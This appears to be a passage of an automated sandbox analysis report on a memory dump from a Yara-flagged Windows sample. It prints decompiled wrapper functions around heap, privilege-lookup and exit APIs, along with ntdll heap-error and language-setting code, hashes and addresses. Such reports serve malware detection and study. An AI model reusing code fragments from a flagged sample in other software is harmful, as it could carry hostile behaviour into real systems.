                                                    0x004184b9
                                                    0x004184bb
                                                    0x004184c3
                                                    0x004184cf
                                                    0x004184d7
                                                    0x004184ed
                                                    0x004184f1

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 26aa277d1363c8a9c657ac7ecc64d778b30bea4dadce46402f512a032c5da1fa
                                                    • Instruction ID: f1bed7a69991cb8befe692d360b455c412a29a10d403e6ca0c7b45281b5e36ab
                                                    • Opcode Fuzzy Hash: 26aa277d1363c8a9c657ac7ecc64d778b30bea4dadce46402f512a032c5da1fa
                                                    • Instruction Fuzzy Hash: 8BE0D8B45182815FDB41FF39D8C089B7B94EF812183045559E8D98B657C521D416C7B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                    0x004184cf
                                                    0x004184d7
                                                    0x004184ed
                                                    0x004184f1

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                    0x00418497
                                                    0x004184ad
                                                    0x004184b1

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                    0x00418503
                                                    0x0041851a
                                                    0x00418528

                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0125967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ad8d9c6c18b179e7b5db0cf32282b1633fa822892abe45da68ece344e810e73b
                                                    • Instruction ID: e0cc12b103787b91e5554ae728f95497fedd6a0b8793b30ad117ceae89354360
                                                    • Opcode Fuzzy Hash: ad8d9c6c18b179e7b5db0cf32282b1633fa822892abe45da68ece344e810e73b
                                                    • Instruction Fuzzy Hash: D0B09B719114CEC9DB51D7B54608717794477D0755F16C051D2420645F4778C0D5F6F5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 012CB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • The resource is owned shared by %d threads, xrefs: 012CB37E
                                                    • a NULL pointer, xrefs: 012CB4E0
                                                    • The critical section is owned by thread %p., xrefs: 012CB3B9
                                                    • read from, xrefs: 012CB4AD, 012CB4B2
                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 012CB323
                                                    • *** enter .cxr %p for the context, xrefs: 012CB50D
                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 012CB48F
                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 012CB314
                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 012CB2F3
                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 012CB47D
                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 012CB39B
                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 012CB476
                                                    • The instruction at %p tried to %s , xrefs: 012CB4B6
                                                    • *** then kb to get the faulting stack, xrefs: 012CB51C
                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012CB3D6
                                                    • an invalid address, %p, xrefs: 012CB4CF
                                                    • The instruction at %p referenced memory at %p., xrefs: 012CB432
                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 012CB2DC
                                                    • *** enter .exr %p for the exception record, xrefs: 012CB4F1
                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 012CB53F
                                                    • The resource is owned exclusively by thread %p, xrefs: 012CB374
                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 012CB484
                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012CB38F
                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 012CB305
                                                    • <unknown>, xrefs: 012CB27E, 012CB2D1, 012CB350, 012CB399, 012CB417, 012CB48E
                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 012CB352
                                                    • *** Inpage error in %ws:%s, xrefs: 012CB418
                                                    • This failed because of error %Ix., xrefs: 012CB446
                                                    • write to, xrefs: 012CB4A6
                                                    • Go determine why that thread has not released the critical section., xrefs: 012CB3C5
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                    • API String ID: 0-108210295
                                                    • Opcode ID: 6dc089e2cb4b57a2c6d5b8ac35e3d7a5d9cb63698dcf60d837357c75b0c3f93e
                                                    • Instruction ID: 32f5b7884994ac5e2e0576dc1e996ff825c7ed43ebec208ac1d902e2a4904133
                                                    • Opcode Fuzzy Hash: 6dc089e2cb4b57a2c6d5b8ac35e3d7a5d9cb63698dcf60d837357c75b0c3f93e
                                                    • Instruction Fuzzy Hash: 6A81F435A71211BBDB266B8A8C4BD7FBF26EF56B91F41424CF7042B153E2A18841C772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012D1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E012D1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x11f48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0121B150();
				} else {
					E0121B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x130589c);
				E0121B150("Heap error detected at %p (heap handle %p)\n",  *0x13058a0);
				_t27 =  *0x1305898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M012D1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0121B150();
				} else {
					E0121B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0121B150("Error code: %d - %s\n",  *0x1305898);
				_t113 =  *0x13058a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0121B150();
					} else {
						E0121B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0121B150("Parameter1: %p\n",  *0x13058a4);
				}
				_t115 =  *0x13058a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0121B150();
					} else {
						E0121B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0121B150("Parameter2: %p\n",  *0x13058a8);
				}
				_t117 =  *0x13058ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0121B150();
					} else {
						E0121B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0121B150("Parameter3: %p\n",  *0x13058ac);
				}
				_t119 =  *0x13058b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0121B150();
					} else {
						E0121B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x13058b4);
					E0121B150("Last known valid blocks: before - %p, after - %p\n",  *0x13058b0);
				} else {
					_t120 =  *0x13058b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0121B150();
				} else {
					E0121B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0121B150("Stack trace available at %p\n", 0x13058c0);
			}











                                                    0x012d1c10
                                                    0x012d1c16
                                                    0x012d1c1e
                                                    0x012d1c3d
                                                    0x012d1c3e
                                                    0x012d1c20
                                                    0x012d1c35
                                                    0x012d1c3a
                                                    0x012d1c44
                                                    0x012d1c55
                                                    0x012d1c5a
                                                    0x012d1c65
                                                    0x012d1c67
                                                    0x00000000
                                                    0x012d1c6e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012d1c67
                                                    0x012d1cdc
                                                    0x012d1ce5
                                                    0x012d1d04
                                                    0x012d1d05
                                                    0x012d1ce7
                                                    0x012d1cfc
                                                    0x012d1d01
                                                    0x012d1d0b
                                                    0x012d1d17
                                                    0x012d1d1f
                                                    0x012d1d25
                                                    0x012d1d30
                                                    0x012d1d4f
                                                    0x012d1d50
                                                    0x012d1d32
                                                    0x012d1d47
                                                    0x012d1d4c
                                                    0x012d1d61
                                                    0x012d1d67
                                                    0x012d1d68
                                                    0x012d1d6e
                                                    0x012d1d79
                                                    0x012d1d98
                                                    0x012d1d99
                                                    0x012d1d7b
                                                    0x012d1d90
                                                    0x012d1d95
                                                    0x012d1daa
                                                    0x012d1db0
                                                    0x012d1db1
                                                    0x012d1db7
                                                    0x012d1dc2
                                                    0x012d1de1
                                                    0x012d1de2
                                                    0x012d1dc4
                                                    0x012d1dd9
                                                    0x012d1dde
                                                    0x012d1df3
                                                    0x012d1df9
                                                    0x012d1dfa
                                                    0x012d1e00
                                                    0x012d1e0a
                                                    0x012d1e13
                                                    0x012d1e32
                                                    0x012d1e33
                                                    0x012d1e15
                                                    0x012d1e2a
                                                    0x012d1e2f
                                                    0x012d1e39
                                                    0x012d1e4a
                                                    0x012d1e02
                                                    0x012d1e02
                                                    0x012d1e08
                                                    0x00000000
                                                    0x00000000
                                                    0x012d1e08
                                                    0x012d1e5b
                                                    0x012d1e7a
                                                    0x012d1e7b
                                                    0x012d1e5d
                                                    0x012d1e72
                                                    0x012d1e77
                                                    0x012d1e95

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                    • API String ID: 0-2897834094
                                                    • Opcode ID: 7f508e2e24ad8080e8bc749d889bd454cc7da59b19e5f4cc054f9da6b0cb56d8
                                                    • Instruction ID: ff8b21c140a53b9206e3103189daa0c3a5fde740449087f853c27d3084f4ac02
                                                    • Opcode Fuzzy Hash: 7f508e2e24ad8080e8bc749d889bd454cc7da59b19e5f4cc054f9da6b0cb56d8
                                                    • Instruction Fuzzy Hash: 9F61D732631145DFD316EB89E485E3477F4EB14A20B0B846EF9095BB86D7749CA1CF0A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01223D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E01223D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01221B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01221B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01221B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01221B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01221B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01234620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0125F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01261370(_t276, 0x11f4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0125BB40(0,  &_v68, _t170);
									if(L012243C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0125BB40(_t257,  &_v68, _t243);
								if(L012243C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01261370(_t278, 0x11f4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01234620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0125F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01261370(_v16, 0x11f4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0125BB40(_t262,  &_v68, _t244);
								if(L012243C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01261370(_t282, 0x11f4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0125BB40(_t262,  &_v68, _t201);
							if(L012243C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01234620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0125F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01261370(_t280, 0x11f4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0125BB40(_t267,  &_v68, _t245);
							if(L012243C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01261370(_t284, 0x11f4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0125BB40(_t267,  &_v68, _t224);
						if(L012243C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                    0x01223d3c
                                                    0x01223d42
                                                    0x01223d44
                                                    0x01223d46
                                                    0x01223d49
                                                    0x01223d4c
                                                    0x01223d4f
                                                    0x01223d52
                                                    0x01223d55
                                                    0x01223d58
                                                    0x01223d5b
                                                    0x01223d5f
                                                    0x01223d61
                                                    0x01223d66
                                                    0x01278213
                                                    0x01278218
                                                    0x01224085
                                                    0x01224088
                                                    0x0122408e
                                                    0x01224094
                                                    0x0122409a
                                                    0x012240a0
                                                    0x012240a6
                                                    0x012240a9
                                                    0x012240af
                                                    0x012240b6
                                                    0x012240bd
                                                    0x012240bd
                                                    0x01223d83
                                                    0x0127821f
                                                    0x01278229
                                                    0x01278238
                                                    0x01278238
                                                    0x0127823d
                                                    0x0127823d
                                                    0x01223da0
                                                    0x01223daf
                                                    0x01223db5
                                                    0x01223dba
                                                    0x01223dba
                                                    0x01223dd4
                                                    0x01223e94
                                                    0x01223eab
                                                    0x01223f6d
                                                    0x01223f84
                                                    0x0122406b
                                                    0x0122406b
                                                    0x0122406e
                                                    0x0122406e
                                                    0x01224070
                                                    0x01224074
                                                    0x01278351
                                                    0x01278351
                                                    0x0122407a
                                                    0x0122407f
                                                    0x0127835d
                                                    0x01278370
                                                    0x01278377
                                                    0x01278379
                                                    0x0127837c
                                                    0x0127837c
                                                    0x0127835d
                                                    0x00000000
                                                    0x0122407f
                                                    0x01223f8a
                                                    0x01223f8d
                                                    0x01223f90
                                                    0x01223f95
                                                    0x0127830d
                                                    0x0127830f
                                                    0x01223f9b
                                                    0x01223fac
                                                    0x01223fae
                                                    0x01223fb1
                                                    0x01223fb1
                                                    0x01223fb6
                                                    0x01278317
                                                    0x0127831a
                                                    0x00000000
                                                    0x01223fbc
                                                    0x01223fc1
                                                    0x01223fc9
                                                    0x01223fd7
                                                    0x01223fda
                                                    0x01223fdd
                                                    0x01224021
                                                    0x01224021
                                                    0x01224029
                                                    0x01224030
                                                    0x01224044
                                                    0x01224046
                                                    0x01224046
                                                    0x01224044
                                                    0x01224049
                                                    0x01278327
                                                    0x01278334
                                                    0x01278339
                                                    0x0127833c
                                                    0x0122404f
                                                    0x0122404f
                                                    0x0122404f
                                                    0x01224051
                                                    0x01224056
                                                    0x01224063
                                                    0x01224063
                                                    0x01224068
                                                    0x00000000
                                                    0x01224068
                                                    0x01223fdf
                                                    0x01223fe2
                                                    0x01223fe4
                                                    0x01223fe7
                                                    0x01223fef
                                                    0x01224003
                                                    0x01224005
                                                    0x01224005
                                                    0x0122400c
                                                    0x01224013
                                                    0x01224016
                                                    0x01224017
                                                    0x0122401b
                                                    0x0122401e
                                                    0x00000000
                                                    0x0122401e
                                                    0x01223fb6
